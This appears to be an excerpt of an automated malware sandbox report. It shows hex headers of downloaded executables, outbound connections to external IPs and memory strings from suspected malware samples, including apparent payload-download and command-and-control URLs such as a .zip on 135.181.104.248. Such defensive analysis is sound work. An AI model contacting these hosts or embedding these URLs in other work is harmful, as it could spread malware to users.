00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Aug 2022 01:42:55 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:40:08 GMTETag: "62543dc8-a73b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Aug 2022 01:42:57 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:58 GMTETag: "62543dbe-3e1b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Aug 2022 01:42:57 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 12:28:56 GMTETag: "62541f08-10c5d7"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00

Source: global traffic	TCP traffic: 192.168.2.3:49914 -> 103.89.90.61:34589
Source: global traffic	TCP traffic: 192.168.2.3:49960 -> 195.54.170.157:16525
Source: global traffic	TCP traffic: 192.168.2.3:49969 -> 176.113.115.146:9582
Source: global traffic	TCP traffic: 192.168.2.3:49984 -> 185.191.229.101:40915

Source: real.exe, 0000001D.00000002.815261595.000000000129C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://135.181.104.248/
Source: real.exe, 0000001D.00000002.815261595.000000000129C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://135.181.104.248/)
Source: real.exe, 0000001D.00000002.815261595.000000000129C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://135.181.104.248/.
Source: real.exe, 0000001D.00000002.815261595.000000000129C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://135.181.104.248/0
Source: real.exe, 0000001D.00000002.815261595.000000000129C000.00000004.00000020.00020000.00000000.sdmp, real.exe, 0000001D.00000002.803649116.000000000121A000.00000004.00000020.00020000.00000000.sdmp, real.exe, 0000001D.00000003.406525655.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, real.exe, 0000001D.00000003.415554897.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://135.181.104.248/0586872789.zip
Source: real.exe, 0000001D.00000002.803649116.000000000121A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://135.181.104.248/0586872789.zipU
Source: real.exe, 0000001D.00000003.406525655.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, real.exe, 0000001D.00000003.415554897.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://135.181.104.248/0586872789.zipowsp
Source: real.exe, 0000001D.00000002.815261595.000000000129C000.00000004.00000020.00020000.00000000.sdmp, real.exe, 0000001D.00000003.406525655.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, real.exe, 0000001D.00000003.415554897.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://135.181.104.248/1571
Source: real.exe, 0000001D.00000002.815261595.000000000129C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://135.181.104.248/_
Source: real.exe, 0000001D.00000002.815261595.000000000129C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://135.181.104.248/rosoft
Source: real.exe, 0000001D.00000002.790881623.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://135.181.104.248:80
Source: real.exe, 0000001D.00000002.787217248.0000000000AFE000.00000004.00000010.00020000.00000000.sdmp, real.exe, 0000001D.00000003.406525655.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, real.exe, 0000001D.00000003.415554897.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://135.181.104.248:80/0586872789.zip
Source: real.exe, 0000001D.00000002.787217248.0000000000AFE000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://135.181.104.248:80/0586872789.zip88e1d2d538d63305298366-d06ed635-68f6-4e9a-955c-90ce-806e6f6e
Source: real.exe, 0000001D.00000003.406525655.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, real.exe, 0000001D.00000003.415554897.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://135.181.104.248:80/0586872789.zipc
Source: WSkT8d093C.exe, WW1.exe, 00000025.00000000.377440161.00000000012D3000.00000002.00000001.01000000.00000015.sdmp, WW1.exe, 00000025.00000002.792118576.00000000012D3000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: http://62.204.41.126:80
Source: WW1.exe, 00000025.00000000.377440161.00000000012D3000.00000002.00000001.01000000.00000015.sdmp, WW1.exe, 00000025.00000002.792118576.00000000012D3000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: http://62.204.41.126:801170NULL%s
Source: softokn3.dll.20.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: softokn3.dll.20.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: softokn3.dll.20.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: SETUP_~1.EXE, 00000028.00000002.844033249.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cdn.discordapp.com
Source: real.exe, 0000001D.00000002.815261595.000000000129C000.00000004.00000020.00020000.00000000.sdmp, real.exe, 0000001D.00000003.406525655.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, real.exe, 0000001D.00000003.415554897.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, real.exe, 0000001D.00000003.362730952.00000000012BC000.00000004.00000020.00020000.00000000.sdmp, SETUP_~1.EXE, 00000028.00000002.817604217.0000000000D40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: softokn3.dll.20.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3.dll.20.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: softokn3.dll.20.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: softokn3.dll.20.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: softokn3.dll.20.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: softokn3.dll.20.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: softokn3.dll.20.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: real.exe, 0000001D.00000002.803649116.000000000121A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsup/1571
Source: SETUP_~1.EXE, 00000028.00000002.842491154.0000000002BDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cutt.ly
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: SETUP_~1.EXE, 00000028.00000002.872396022.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: SETUP_~1.EXE, 00000028.00000002.873395936.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000028.00000002.872396022.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json(Unexpected
Source: SETUP_~1.EXE, 00000028.00000002.873395936.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000028.00000002.872396022.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json2IsSpecified
Source: SETUP_~1.EXE, 00000028.00000002.873395936.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000028.00000002.872396022.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/jsonlCould
